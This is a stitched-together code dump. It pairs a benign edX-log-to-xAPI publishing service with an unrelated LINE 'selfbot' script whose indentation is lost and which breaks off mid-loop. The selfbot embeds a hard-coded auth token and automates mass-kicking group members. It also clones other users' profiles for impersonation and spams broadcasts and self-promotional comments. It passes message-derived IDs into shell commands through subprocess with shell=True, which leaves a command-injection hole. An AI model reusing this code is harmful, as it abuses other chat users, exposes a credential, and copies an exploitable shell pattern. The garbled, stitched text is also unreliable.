    """Manages the batching and publishing of statements in a thread-safe way."""
    def __init__(self):
        # pending statements for the next batch; guarded by cache_lock
        self.cache = []
        self.cache_lock = threading.Lock()
        # timer that force-flushes a partial batch after PUBLISH_MAX_WAIT_TIME
        self.publish_timer = None
        # consecutive connection-failure retries for the current batch
        self.publish_retries = 0
        self.total_published_successfully = 0
    def __del__(self):
        self.destroy()
    def destroy(self):
        # cancel any pending flush timer so its thread can exit
        if self.publish_timer is not None:
            self.publish_timer.cancel()
    def push(self, stmt):
        """Add a statement to the outgoing queue."""
        # push statement to queue
        with self.cache_lock:
            self.cache.append(stmt)
        # set timeout to publish statements
        # (the first statement of a new batch arms the flush timer)
        if len(self.cache) == 1 and settings.PUBLISH_MAX_WAIT_TIME > 0:
            self.publish_timer = threading.Timer(settings.PUBLISH_MAX_WAIT_TIME, self.publish)
            self.publish_timer.start()
        # publish immediately if statement threshold is reached
        if settings.PUBLISH_MAX_PAYLOAD <= len(self.cache):
            self.publish()
    def publish(self):
        """Publish the queued statements to the LRS and clear the queue."""
        # make sure no new statements are added while publishing
        with self.cache_lock:
            # build StatementList
            lrs_success = False
            statements = statement_list.StatementList(self.cache)
            while lrs_success is False and len(statements) > 0:
                try:
                    lrs_resp = client.lrs_publisher.publish_statements(statements)
                    lrs_success = True
                    self.publish_retries = 0  # reset retries
                    self.total_published_successfully += len(statements)
                    # NOTE(review): error level appears to be used for
                    # visibility (the root logging config is minimal) -- confirm
                    logger.error("{} statements published successfully".format(self.total_published_successfully))
                    if getattr(settings, 'TEST_LOAD_SUCCESSFUL_STATEMENTS_BENCHMARK', 0) > 0:
                        benchmark = settings.TEST_LOAD_SUCCESSFUL_STATEMENTS_BENCHMARK
                        if self.total_published_successfully >= benchmark:
                            logger.error("published {} or more statements at {}".format(benchmark, datetime.now()))
                except exceptions.XAPIBridgeLRSConnectionError as e:
                    # if it was an auth problem, fail
                    # if it was a connection problem, retry
                    if self.publish_retries <= settings.PUBLISH_MAX_RETRIES:
                        self.publish_retries += 1
                    else:
                        e.err_fail()
                        break
                except exceptions.XAPIBridgeStatementStorageError as e:
                    # remove the failed Statement from StatementList
                    # and retry, logging non-failing exception
                    e.message = "Removing rejected Statement and retrying publishing StatementList. Rejected Statement was {}. LRS message was {}".format(e.statement.to_json(), e.message)
                    e.err_continue_msg()
                    statements.remove(e.statement)
            # clear the cache and cancel publish timer whether successful or not
            self.cache = []
            if self.publish_timer is not None:
                self.publish_timer.cancel()
class NotifierLostINodeException(NotifierError):
    """Exception to handle inotify loss of current watched inode.

    Raised by TailHandler when the watched tracking log is moved or
    deleted (log rotation), so watch() can restart on the new file.
    """
class TailHandler(ProcessEvent):
    """Parse incoming log events, convert to xapi, and add to publish queue.

    Context-manager: on exit the pending queue is flushed and the input
    file handle closed.
    """
    # watch create and moved to events since tracking log may be re-created during log rotation
    # example inotifywatch /edx/var/log/tracking/tracking.log output:
    # (after performing a sudo logrotate --force /edx/var/log/tracking/tracking.log)
    # total access modify attrib close_write open move_self delete_self filename
    # 30 16 7 1 2 1 1 1 /edx/var/log/tracking/tracking.log
    # depending on the kernel and underlying inotify, either or both of IN_MOVE_SELF or IN_DELETE_SELF will fire
    # exit the handler on whichever fires first
    MASK = EventsCodes.OP_FLAGS['IN_MODIFY'] | EventsCodes.OP_FLAGS['IN_MOVE_SELF'] | EventsCodes.OP_FLAGS['IN_DELETE_SELF']
    def my_init(self, **kw):
        # called via __init__ on superclass
        # prepare file input stream: line-buffered, seeked to EOF so only
        # lines written after startup are processed
        self.ifp = open(kw['filename'], 'r', 1)
        self.ifp.seek(0, 2)
        self.publish_queue = QueueManager()
        # holds a trailing partial line until its newline arrives
        self.raceBuffer = ''
    def __enter__(self):
        return self
    def __exit__(self, etype, value, traceback):
        # flush queue before exiting
        self.publish_queue.publish()
        self.publish_queue.destroy()
        self.ifp.close()
    def process_IN_MODIFY(self, event):
        """Handle any changes to the log file."""
        # read all new contents from the end of the file
        buff = self.raceBuffer + self.ifp.read()
        # if there's no newline at end of file, we probably read it before edx finished writing
        # add read contents to a buffer and return
        if len(buff) != 0 and buff[-1] != '\n':
            self.raceBuffer = buff
        else:
            self.raceBuffer = ''
            evts = [i for i in buff.split('\n') if len(i) != 0]
            for e in evts:
                try:
                    evt_obj = json.loads(e)
                except ValueError:
                    # BUG FIX: the event text was passed as a lazy %-argument
                    # with no placeholder in the message, which breaks record
                    # formatting and drops the text; add the %s placeholder.
                    logger.warning('Could not parse JSON for %s', e)
                    continue
                xapi = None
                try:
                    xapi = converter.to_xapi(evt_obj)
                except (exceptions.XAPIBridgeStatementConversionError, ) as exc:
                    # renamed from `e` to stop shadowing the loop variable
                    exc.err_continue_msg()
                if xapi is not None:
                    for i in xapi:
                        self.publish_queue.push(i)
                # print u'{} - {} {} {}'.format(i['timestamp'], i['actor']['name'], i['verb']['display']['en-US'], i['object']['definition']['name']['en-US'])
    def process_IN_MOVE_SELF(self, event):
        """Handle moved tracking log file; e.g., during log rotation."""
        msg = "caught inotify IN_MOVE_SELF (tracking log file moved)"
        logger.info(msg)
        raise NotifierLostINodeException(msg)
    def process_IN_DELETE_SELF(self, event):
        """Handle deletion of tracking log file e.g., during log rotation."""
        msg = "caught inotify IN_DELETE_SELF (tracking log file deleted)"
        logger.info(msg)
        raise NotifierLostINodeException(msg)
def watch(watch_file):
    """Watch the given file for changes, restarting after log rotation.

    BUG FIX: the original restarted by calling watch() recursively from the
    exception handler, growing the call stack once per log rotation for the
    life of the process; restart with a loop instead. Also guards against
    `notifier` being unbound when setup fails before Notifier() is created.
    """
    while True:
        # error level is used for visibility (root logging config is minimal)
        logger.error('Starting watch')
        wm = WatchManager()
        notifier = None
        try:
            with TailHandler(filename=watch_file) as th:
                logger.error('adding pyinotify watcher/notifier')
                notifier = Notifier(wm, th, read_freq=settings.NOTIFIER_READ_FREQ, timeout=settings.NOTIFIER_POLL_TIMEOUT)
                wm.add_watch(watch_file, TailHandler.MASK)
                notifier.loop()
            # loop() returned normally: stop watching altogether
            return
        except NotifierLostINodeException:
            # end and restart watch on the re-created file
            logger.error("stopping notifier and restarting watch")
            if notifier is not None:
                notifier.stop()  # close inotify instance
        finally:
            logger.error('Exiting watch')
def signal_terminate_handler(signum, frame):
    """Handle terminating signals from terminal or sysctl to properly shut down.

    http_server and thread are module globals created in the __main__ block
    when HTTP_PUBLISH_STATUS is enabled.
    """
    if settings.HTTP_PUBLISH_STATUS is True:
        logger.info("Shutting down http server")
        http_server.shutdown()
        http_server.socket.close()
        thread.join(2.0)
    # SystemExit unwinds through watch()'s cleanup before exiting
    raise SystemExit
# register the graceful-shutdown handler for the usual termination signals
for sig in (signal.SIGHUP, signal.SIGINT, signal.SIGTERM, signal.SIGABRT):
    signal.signal(sig, signal_terminate_handler)
if __name__ == '__main__':
    if getattr(settings, 'DEBUG_MODE', False):
        logging.basicConfig(
            format='%(levelname)s:%(message)s',
            level=logging.DEBUG
        )
    else:
        # NOTE(review): every option is commented out, so this configures the
        # root logger with defaults (WARNING to stderr) -- which is why the
        # rest of the module logs informational messages at error level
        logging.basicConfig(
            #filename='/edx/var/log/xapi/xapi_bridge.log',
            #filemode='a+',
            #format='%(levelname)s:%(message)s',
            #level=logging.INFO
        )
    if settings.HTTP_PUBLISH_STATUS is True:
        # open a TCP socket and HTTP server for simple OK status response
        # for service uptime monitoring
        http_server = server.httpd
        thread = threading.Thread(target=http_server.serve_forever)
        thread.daemon = True
        thread.start()
    # try to connect to the LRS immediately
    lrs = client.lrs
    resp = lrs.about()
    if resp.success:
        logger.error('Successfully connected to remote LRS at {}. Described by {}'.format(settings.LRS_ENDPOINT, resp.data))
    else:
        e = exceptions.XAPIBridgeLRSConnectionError(resp)
        e.err_fail()
    # tracking log path may be overridden by the first CLI argument
    log_path = os.path.abspath(sys.argv[1]) if len(sys.argv) > 1 else '/edx/var/log/tracking/tracking.log'
    logger.error('Watching file {}, starting time {}'.format(log_path, str(datetime.now())))
    watch(log_path)
|
CatBot_Selfbot.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,ast,os,subprocess,requests
# create the LINE client and log in with a stored token
cl = LINETCR.LINE()
#cl.login(qr=True)
# SECURITY(review): hard-coded auth token committed to source -- rotate it
# and load it from the environment or a config file instead.
cl.login(token="EnliZjabbWniaqdsPTt5.nqZhqiZgZilGvU4eyth5jq.4DldEayovtSgtlpllfy/HiizJIJKmojjW1RC3eFY7RE=")
cl.loginResult()
print "===[Login Success]==="
# user-facing help text, sent verbatim on "Help"/"Key"
helpMessage ="""
====={List Keyword]=====
► Help
► Creator
► Gcreator
► List group:
► Leave group:
► Cancel
► Url:on/off
► Autojoin:on/off
► Autocancel:on/off
► Qr:on/off
► Autokick:on/off
► Contact:on/off
► Gift (1,2,3)
► Tagall
► Setview
► Viewseen
► Boom
► Add all
► Recover
► Remove all chat
► Gn: (name)
► Kick: (mid)
► Invite: (mid)
► Welcome
► Bc: (text)
► Cancelall
► Gurl
► Self Like
► Speed
► Ban
► Unban
► Copy @
► Backup me
► Ban @
► Unban @
► Banlist
► Kill ban
"""
# mid of the account the bot runs as.
# BUG FIX: the original read cl.getProfile().mid["u350cc7408..."], i.e. it
# indexed the mid string with a string key, which raises TypeError at
# startup. The profile mid itself is what is wanted here.
mid = cl.getProfile().mid
Creator=["u350cc7408cc6cc82e056ee046131f925"]
admin=["u350cc7408cc6cc82e056ee046131f925"]
contact = cl.getProfile()
profile = cl.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
# mutable runtime state: feature toggles and the kicker blacklist
wait = {
    "LeaveRoom":True,
    "AutoJoin":True,
    "Members":0,
    "AutoCancel":False,
    "AutoKick":False,
    "blacklist":{},
    "wblacklist":False,
    "dblacklist":False,
    "Qr":True,
    "Timeline":True,
    "Contact":True,
    "lang":"JP",
    "BlGroup":{}
}
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Build a Message addressed to `to` and bump its per-target counter.

    NOTE(review): this function builds `mes` but never actually sends it,
    and `messageReq` is not defined anywhere in this file, so calling it
    raises NameError -- looks like dead/incomplete code; confirm intent.
    NOTE(review): the mutable default `contentMetadata={}` is shared across
    calls.
    """
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def bot(op):
try:
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if mid in op.param3:
if wait["AutoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
if wait["AutoCancel"] == True:
if op.param3 in admin:
pass
else:
cl.cancelGroupInvitation(op.param1, [op.param3])
else:
if op.param3 in wait["blacklist"]:
cl.cancelGroupInvitation(op.param1, [op.param3])
cl.sendText(op.param1, "Itu kicker jgn di invite!")
else:
pass
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
if op.param2 in admin:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------NOTIFIED_UPDATE_GROUP---------------------
if op.type == 11:
if wait["Qr"] == True:
if op.param2 in admin:
pass
else:
cl.sendText(msg.to, "Jangan mainan QR ntr ada kicker")
else:
pass
#--------------------------SEND_MESSAGE---------------------------
if op.type == 25:
msg = op.message
#----------------------------------------------------------------------------
if msg.contentType == 13:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] not in admin:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
else:
cl.sendText(msg.to,"Admin Detected~")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
#--------------------------------------------------------
elif wait["Contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
#--------------------------------------------------------
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[Group name]\n" + str(ginfo.name) + "\n\n[Gid]\n" + msg.to + "\n\n[Group creator]\n" + gCreator + "\n\n[Profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "members\nPending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------------
elif msg.text is None:
return
#--------------------------------------------------------
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Yang Bikin BOT")
#--------------------------------------------------------
elif msg.text in ["Group creator","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Yang Buat Grup Ini")
#--------------------------------------------------------
elif msg.contentType == 16:
if wait["Timeline"] == True:
msg.contentType = 0
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
#--------------------------------------------------------
elif msg.text in ["Key","help","Help"]:
cl.sendText(msg.to,helpMessage)
#--------------------------------------------------------
elif msg.text in ["List group"]:
gid = cl.getGroupIdsJoined()
h = ""
jml = 0
for i in gid:
gn = cl.getGroup(i).name
h += "♦【%s】\n" % (gn)
jml += 1
cl.sendText(msg.to,"======[List Group]======\n"+ h +"Total group: "+str(jml))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bye "+h+"~")
cl.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
cl.sendText(msg.to,"No one is inviting")
else:
Cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Ourl","Url:on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
cl.sendText(msg.to,"Url Active")
else:
cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Curl","Url:off"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
cl.sendText(msg.to,"Url inActive")
else:
cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Join on","Autojoin:on"]:
wait["AutoJoin"] = True
cl.sendText(msg.to,"AutoJoin Active")
elif msg.text in ["Join off","Autojoin:off"]:
wait["AutoJoin"] = False
cl.sendText(msg.to,"AutoJoin inActive")
#--------------------------------------------------------
elif msg.text in ["Autocancel:on"]:
wait["AutoCancel"] = True
cl.sendText(msg.to,"The group of people and below decided to automatically refuse invitation")
print wait["AutoCancel"][msg.to]
elif msg.text in ["Autocancel:off"]:
wait["AutoCancel"] = False
cl.sendText(msg.to,"Invitation refused turned off")
print wait["AutoCancel"][msg.to]
#--------------------------------------------------------
elif "Qr:on" in msg.text:
wait["Qr"] = True
cl.sendText(msg.to,"QR Protect Active")
elif "Qr:off" in msg.text:
wait["Qr"] = False
cl.sendText(msg.to,"Qr Protect inActive")
#--------------------------------------------------------
elif "Autokick:on" in msg.text:
wait["AutoKick"] = True
cl.sendText(msg.to,"AutoKick Active")
elif "Autokick:off" in msg.text:
wait["AutoKick"] = False
cl.sendText(msg.to,"AutoKick inActive")
#--------------------------------------------------------
elif msg.text in ["K on","Contact:on"]:
wait["Contact"] = True
cl.sendText(msg.to,"Contact Active")
elif msg.text in ["K off","Contact:off"]:
wait["Contact"] = False
cl.sendText(msg.to,"Contact inActive")
#--------------------------------------------------------
elif msg.text in ["Set"]:
md = ""
if wait["AutoJoin"] == True: md+="✦ Auto join : on\n"
else: md +="✦ Auto join : off\n"
if wait["Contact"] == True: md+="✦ Info Contact : on\n"
else: md+="✦ Info Contact : off\n"
if wait["AutoCancel"] == True:md+="✦ Auto cancel : on\n"
else: md+= "✦ Auto cancel : off\n"
if wait["Qr"] == True: md+="✦ Qr Protect : on\n"
else:md+="✦ Qr Protect : off\n"
if wait["AutoKick"] == True: md+="✦ Autokick : on\n"
else:md+="✦ Autokick : off"
cl.sendText(msg.to,"=====[Status]=====\n"+md)
#--------------------------------------------------------
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
#--------------------------------------------------------
elif "Tagall" == msg.text:
group = cl.getGroup(msg.to)
mem = [contact.mid for contact in group.members]
for mm in mem:
xname = cl.getContact(mm).displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata = {'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as e:
print str(e)
#--------------------------CEK SIDER------------------------------
elif "Setview" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
cl.sendText(msg.to, "Checkpoint checked!")
print "@setview"
elif "Viewseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
conName.append('nones')
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
tukang = "List Viewer\n*"
grp = '\n* '.join(str(f) for f in dataResult)
total = '\n\nTotal %i viewers (%s)' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "%s %s %s" % (tukang, grp, total))
else:
cl.sendText(msg.to, "Belum ada viewers")
print "@viewseen"
#--------------------------------------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
cl.kickoutFromGroup(msg.to,[mention['M']])
#--------------------------------------------------------
elif "Add all" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#--------------------------------------------------------
elif ("Gn: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn: ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------------
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
if midd not in admin:
cl.kickoutFromGroup(msg.to,[midd])
else:
cl.sendText(msg.to,"Admin Detected")
#--------------------------------------------------------
elif "Invite: " in msg.text:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------------
elif msg.text in ["#welcome","Welcome","welcome","Welkam","welkam"]:
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat datang di "+ gs.name)
#--------------------------------------------------------
elif "Bc: " in msg.text:
bc = msg.text.replace("Bc: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~@xpk5386g")
cl.sendText(msg.to,"Success BC BosQ")
#--------------------------------------------------------
elif msg.text in ["Cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
cl.sendText(msg.to,"All invitations have been refused")
#--------------------------------------------------------
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------------
elif msg.text in ["Self Like"]:
try:
print "activity"
url = cl.activity(limit=1)
print url
cl.like(url['result']['posts'][0]['userInfo']['mid'], url['result']['posts'][0]['postInfo']['postId'], likeType=1001)
cl.comment(url['result']['posts'][0]['userInfo']['mid'], url['result']['posts'][0]['postInfo']['postId'], "Mau Kenal?\n ID LINE :boy29putra\nLalu kenalan ama dia")
cl.sendText(msg.to, "Success~")
except Exception as E:
try:
cl.sendText(msg.to,str(E))
except:
pass
#--------------------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
print("Speed")
elapsed_time = time.time() - start
cl.sendText(msg.to, "Progress...")
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#--------------------------------------------------------
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#--------------------------------------------------------
elif "Backup me" in msg.text:
try:
cl.updateDisplayPicture(profile.pictureStatus)
cl.updateProfile(profile)
cl.sendText(msg.to, "Success backup profile")
except Exception as e:
cl.sendText(msg.to, str(e))
#--------------------------------------------------------
elif "Copy " in msg.text:
copy0 = msg.text.replace("Copy ","")
copy1 = copy0.lstrip()
copy2 = copy1.replace("@","")
copy3 = copy2.rstrip()
_name = copy3
group = cl.getGroup(msg.to)
for contact in group.members:
cname = cl.getContact(contact.mid).displayName
if cname == _name:
cl.CloneContactProfile(contact.mid)
cl.sendText(msg.to, "Success~")
else:
pass
#--------------------------------------------------------
elif "Ban @" in msg.text:
if msg.toType == 2:
print "@Ban by mention"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in admin:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes BosQ")
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Admin Detected~")
#--------------------------------------------------------
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"===[Blacklist User]===\n"+mc)
#--------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "@Unban by mention"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes BosQ")
except:
cl.sendText(msg.to,"Succes BosQ")
#--------------------------------------------------------
elif msg.text in ["Kill ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Blacklist emang pantas tuk di usir")
#--------------------------------------------------------
elif "Cleanse" in msg.text:
if msg.toType == 2:
print "Kick all member"
_name = msg.text.replace("Cleanse","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Dadaaah~")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in admin:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except Exception as e:
cl.sendText(msg.to,str(e))
cl.inviteIntoGroup(msg.to, targets)
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot:restart"]:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
#thread2 = threading.Thread(target=nameUpdate)
#thread2.daemon = True
#thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
